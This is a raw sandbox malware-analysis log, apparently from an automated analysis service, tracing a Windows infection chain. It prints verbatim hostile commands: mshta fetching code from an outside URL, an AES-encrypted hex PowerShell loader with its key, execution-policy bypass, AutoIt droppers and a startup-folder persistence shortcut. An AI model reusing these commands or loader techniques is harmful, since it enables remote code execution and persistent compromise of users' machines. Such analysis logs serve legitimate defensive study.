Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8957E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF79F8957E4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B8FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF79F8B8FE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8AAF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF79F8AAF58
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00EDA385
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDA354 SetUnhandledExceptionFilter,20_2_00EDA354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_009EA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EA354 SetUnhandledExceptionFilter,24_2_009EA354

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DCE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00007FF79F8DCE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8737B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00007FF79F8737B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8E9420 SendInput,keybd_event,10_2_00007FF79F8E9420
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8ED1A4 mouse_event,10_2_00007FF79F8ED1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('4C4392ECE516D550361614F1B8641852253A5A9044A308574B9B1D67D2AA2493F763385A53C21C962D73AF7A3A1A7644FEF103968D9CE4BE22CDCF4C9AAAA0D1156C1042714327D0DF9559DCEF92D952D1FED7FD44F342E94970DDD5132E30A64E35E4751324A276E21D098222A9D80B841DC7508B47242C8DE36693A37A446E45337CE1895E882872A68C1B8DC77B41FAE1F5DE0A8934D3A20E197DA6F27C6B095CECC866561B5408D27B35AD836E83E5CFCA3209303BBA973A0E0D9CD3E9998D23C90BFE13CC4BEFAE3250CE0200F86C96B61BB66F12DDB70731B13C3A28A955F482A02B32FF9A15DA1ECFBBBF793CC72EDB34A5A987FF46C0D61D6E31A789B13290EB3AD9E662512ADC0281C570BCCF12079609337C2B50C6FF3BD620E71911E95424327F329EB0DC1C6F5355D6B9A0C38A95701B7EFFFD3792E6A3BF2C09DFC231E806D1546112A4E3CA8C984F0E37455D4A9B1BF07168B9D0A2AA9CFED23A36201580A871CA7A00A0FF1092079C043208CA9D5FB2B2CD7B9D78A4DB3176B4A187FC2B0A69302794F7EF5CF7B38EA290D6A3FD0FED4D1A7CFA6F9F2ABEB4968B37732EBE6F7B5D433925FCC54BCF9F0751476C4A1F7381FCAB8207125C23DF8455AB2E13D85EB368A1619B06BF2DA9EAAD111EFB8AEEDDEFD41D80A23271E7E72E7A5905A7C4F3CF522315763C528146A5D8861258033777A0C5EBD195000561C965AA4AC7B18EAD7327CE25B8624E927D2D5D7FDDC36C21B9772937ED991F17813F0F3A8422D3AF278FAD8A504D97390558B4C0E09B3F0AFAEB83FF0ED68659D2D0133F372F5CCA602FCFC65D5B169F7EFD754CC9B688D5590926DABC2E7CF00A4B3C64F8492DDBC72D696028CEA4EF1497C9951F051DD47FBA7AA633AE4216D74BB6544091543B7A4C88AA7D7449070259AA42EF74061F08CAEB6D24698FD62B73C9B854EF540BE2BC1197A260BC8EFAC5EB1F66809412345727AAA19E00AA6AB2B0AE4E8E2214D612DCF3CC187893D8E4EFA843640E5F762AF24639A3DA6573BCBFAAD965B1008B1DA5762FE0C1DEE2B3BC73609EABEB3867D7830D8FF386594BAC138E1F2B5BF3E19010CCEB41ED303E01E3AC4371CCB141E9B798EC90619F0930690897751682C457CE95E208E0D89FCFA0C3A2F215F55C4AFA67942C7969C7EC45757A3F2B843201BA5896CE084ECF029902929420A5A605DCAE06D0E20817E54A84154B910E2A7E99DCE88C63234F53567ECD466A94DB5A936652CFB9B2A1733BB00337D0AD339944F80BA2AFFF40DFE5A067255BCBBA6FDD8FDF8857B0D56E86B756F7C329B1C464F95203B87123A10F7826ED9D32686CD372031EB990E0F919E47B5551BDA69E3DE02837FD75820E2A01F6A7D0AC1F71A9F7457ADE2919759EEA4F517ADD7A983D85B4AB3F976B6B347C72A9F8CE4E17746B79C374BCF7DA567F5D6193036C3A9147BFBF55BD54659FD8DD5702914E8D495DF4376BC0D1E4380DFAEDE844E819363C215834E1E687ABC854482303E7F2A9138B86EA3385D31DA2D6CFAF1C47A1284645A362744A4C2705A1D4B9163FD1BFB07A0A75F1E0DB2117DE25DEDCE3420754D43D6D88BC61EAB468CDACE4EBC10E259AF12DED9C8A0C34E0A2EFB4BD9481FBB751CAA484B894364EA30FC61BF09678F49094CAE7B13B5DC645845DAD9D5663D049F75C8C5C48BD68780101A2414A8D606C6B1B06274EC46254D163CDB2BE295BC7899CDCFF4B92A1A447ACF4B39C8E69');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($vuooveuv){return -split ($vuooveuv -replace '..', '0x$& ')};$ernnew = clean('4c4392ece516d550361614f1b8641852253a5a9044a308574b9b1d67d2aa2493f763385a53c21c962d73af7a3a1a7644fef103968d9ce4be22cdcf4c9aaaa0d1156c1042714327d0df9559dcef92d952d1fed7fd44f342e94970ddd5132e30a64e35e4751324a276e21d098222a9d80b841dc7508b47242c8de36693a37a446e45337ce1895e882872a68c1b8dc77b41fae1f5de0a8934d3a20e197da6f27c6b095cecc866561b5408d27b35ad836e83e5cfca3209303bba973a0e0d9cd3e9998d23c90bfe13cc4befae3250ce0200f86c96b61bb66f12ddb70731b13c3a28a955f482a02b32ff9a15da1ecfbbbf793cc72edb34a5a987ff46c0d61d6e31a789b13290eb3ad9e662512adc0281c570bccf12079609337c2b50c6ff3bd620e71911e95424327f329eb0dc1c6f5355d6b9a0c38a95701b7efffd3792e6a3bf2c09dfc231e806d1546112a4e3ca8c984f0e37455d4a9b1bf07168b9d0a2aa9cfed23a36201580a871ca7a00a0ff1092079c043208ca9d5fb2b2cd7b9d78a4db3176b4a187fc2b0a69302794f7ef5cf7b38ea290d6a3fd0fed4d1a7cfa6f9f2abeb4968b37732ebe6f7b5d433925fcc54bcf9f0751476c4a1f7381fcab8207125c23df8455ab2e13d85eb368a1619b06bf2da9eaad111efb8aeeddefd41d80a23271e7e72e7a5905a7c4f3cf522315763c528146a5d8861258033777a0c5ebd195000561c965aa4ac7b18ead7327ce25b8624e927d2d5d7fddc36c21b9772937ed991f17813f0f3a8422d3af278fad8a504d97390558b4c0e09b3f0afaeb83ff0ed68659d2d0133f372f5cca602fcfc65d5b169f7efd754cc9b688d5590926dabc2e7cf00a4b3c64f8492ddbc72d696028cea4ef1497c9951f051dd47fba7aa633ae4216d74bb6544091543b7a4c88aa7d7449070259aa42ef74061f08caeb6d24698fd62b73c9b854ef540be2bc1197a260bc8efac5eb1f66809412345727aaa19e00aa6ab2b0ae4e8e2214d612dcf3cc187893d8e4efa843640e5f762af24639a3da6573bcbfaad965b1008b1da5762fe0c1dee2b3bc73609eabeb3867d7830d8ff386594bac138e1f2b5bf3e19010cceb41ed303e01e3ac4371ccb141e9b798ec90619f0930690897751682c457ce95e208e0d89fcfa0c3a2f215f55c4afa67942c7969c7ec45757a3f2b843201ba5896ce084ecf029902929420a5a605dcae06d0e20817e54a84154b910e2a7e99dce88c63234f53567ecd466a94db5a936652cfb9b2a1733bb00337d0ad339944f80ba2afff40dfe5a067255bcbba6fdd8fdf8857b0d56e86b756f7c329b1c464f95203b87123a10f7826ed9d32686cd372031eb990e0f919e47b5551bda69e3de02837fd75820e2a01f6a7d0ac1f71a9f7457ade2919759eea4f517add7a983d85b4ab3f976b6b347c72a9f8ce4e17746b79c374bcf7da567f5d6193036c3a9147bfbf55bd54659fd8dd5702914e8d495df4376bc0d1e4380dfaede844e819363c215834e1e687abc854482303e7f2a9138b86ea3385d31da2d6cfaf1c47a1284645a362744a4c2705a1d4b9163fd1bfb07a0a75f1e0db2117de25dedce3420754d43d6d88bc61eab468cdace4ebc10e259af12ded9c8a0c34e0a2efb4bd9481fbb751caa484b894364ea30fc61bf09678f49094cae7b13b5dc645845dad9d5663d049f75c8c5c48bd68780101a2414a8d606c6b1b06274ec46254d163cdb2be295bc7899cdcff4b92a1a447acf4b39c8e69');$ozcbkp = [system.security.cryptography.aes]::create();$ozcbkp.key = clean('614a73516f706c757242416c6e617351');$ozcbkp.iv = new-object byte[] 16;$nfafpwetu = $ozcbkp.createdecryptor();$jftlkjake = [text.encoding]::utf8.getstring($nfafpwetu.transformfinalblock($
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($vuooveuv){return -split ($vuooveuv -replace '..', '0x$& ')};$ernnew = clean('4c4392ece516d550361614f1b8641852253a5a9044a308574b9b1d67d2aa2493f763385a53c21c962d73af7a3a1a7644fef103968d9ce4be22cdcf4c9aaaa0d1156c1042714327d0df9559dcef92d952d1fed7fd44f342e94970ddd5132e30a64e35e4751324a276e21d098222a9d80b841dc7508b47242c8de36693a37a446e45337ce1895e882872a68c1b8dc77b41fae1f5de0a8934d3a20e197da6f27c6b095cecc866561b5408d27b35ad836e83e5cfca3209303bba973a0e0d9cd3e9998d23c90bfe13cc4befae3250ce0200f86c96b61bb66f12ddb70731b13c3a28a955f482a02b32ff9a15da1ecfbbbf793cc72edb34a5a987ff46c0d61d6e31a789b13290eb3ad9e662512adc0281c570bccf12079609337c2b50c6ff3bd620e71911e95424327f329eb0dc1c6f5355d6b9a0c38a95701b7efffd3792e6a3bf2c09dfc231e806d1546112a4e3ca8c984f0e37455d4a9b1bf07168b9d0a2aa9cfed23a36201580a871ca7a00a0ff1092079c043208ca9d5fb2b2cd7b9d78a4db3176b4a187fc2b0a69302794f7ef5cf7b38ea290d6a3fd0fed4d1a7cfa6f9f2abeb4968b37732ebe6f7b5d433925fcc54bcf9f0751476c4a1f7381fcab8207125c23df8455ab2e13d85eb368a1619b06bf2da9eaad111efb8aeeddefd41d80a23271e7e72e7a5905a7c4f3cf522315763c528146a5d8861258033777a0c5ebd195000561c965aa4ac7b18ead7327ce25b8624e927d2d5d7fddc36c21b9772937ed991f17813f0f3a8422d3af278fad8a504d97390558b4c0e09b3f0afaeb83ff0ed68659d2d0133f372f5cca602fcfc65d5b169f7efd754cc9b688d5590926dabc2e7cf00a4b3c64f8492ddbc72d696028cea4ef1497c9951f051dd47fba7aa633ae4216d74bb6544091543b7a4c88aa7d7449070259aa42ef74061f08caeb6d24698fd62b73c9b854ef540be2bc1197a260bc8efac5eb1f66809412345727aaa19e00aa6ab2b0ae4e8e2214d612dcf3cc187893d8e4efa843640e5f762af24639a3da6573bcbfaad965b1008b1da5762fe0c1dee2b3bc73609eabeb3867d7830d8ff386594bac138e1f2b5bf3e19010cceb41ed303e01e3ac4371ccb141e9b798ec90619f0930690897751682c457ce95e208e0d89fcfa0c3a2f215f55c4afa67942c7969c7ec45757a3f2b843201ba5896ce084ecf029902929420a5a605dcae06d0e20817e54a84154b910e2a7e99dce88c63234f53567ecd466a94db5a936652cfb9b2a1733bb00337d0ad339944f80ba2afff40dfe5a067255bcbba6fdd8fdf8857b0d56e86b756f7c329b1c464f95203b87123a10f7826ed9d32686cd372031eb990e0f919e47b5551bda69e3de02837fd75820e2a01f6a7d0ac1f71a9f7457ade2919759eea4f517add7a983d85b4ab3f976b6b347c72a9f8ce4e17746b79c374bcf7da567f5d6193036c3a9147bfbf55bd54659fd8dd5702914e8d495df4376bc0d1e4380dfaede844e819363c215834e1e687abc854482303e7f2a9138b86ea3385d31da2d6cfaf1c47a1284645a362744a4c2705a1d4b9163fd1bfb07a0a75f1e0db2117de25dedce3420754d43d6d88bc61eab468cdace4ebc10e259af12ded9c8a0c34e0a2efb4bd9481fbb751caa484b894364ea30fc61bf09678f49094cae7b13b5dc645845dad9d5663d049f75c8c5c48bd68780101a2414a8d606c6b1b06274ec46254d163cdb2be295bc7899cdcff4b92a1a447acf4b39c8e69');$ozcbkp = [system.security.cryptography.aes]::create();$ozcbkp.key = clean('614a73516f706c757242416c6e617351');$ozcbkp.iv = new-object byte[] 16;$nfafpwetu = $ozcbkp.createdecryptor();$jftlkjake = [text.encoding]::utf8.getstring($nfafpwetu.transformfinalblock($Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DC858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00007FF79F8DC858
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00007FF79F8DD540
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5D032000.00000004.00000800.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PefjSkkhb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8AFD20 cpuid 10_2_00007FF79F8AFD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8ABEF8 GetSystemTimeAsFileTime,10_2_00007FF79F8ABEF8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8D2BCF GetUserNameW,10_2_00007FF79F8D2BCF
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B2650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00007FF79F8B2650
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F891D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_00007FF79F891D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000012.00000002.2020537958.000002DA80408000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000014.00000002.2934777577.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
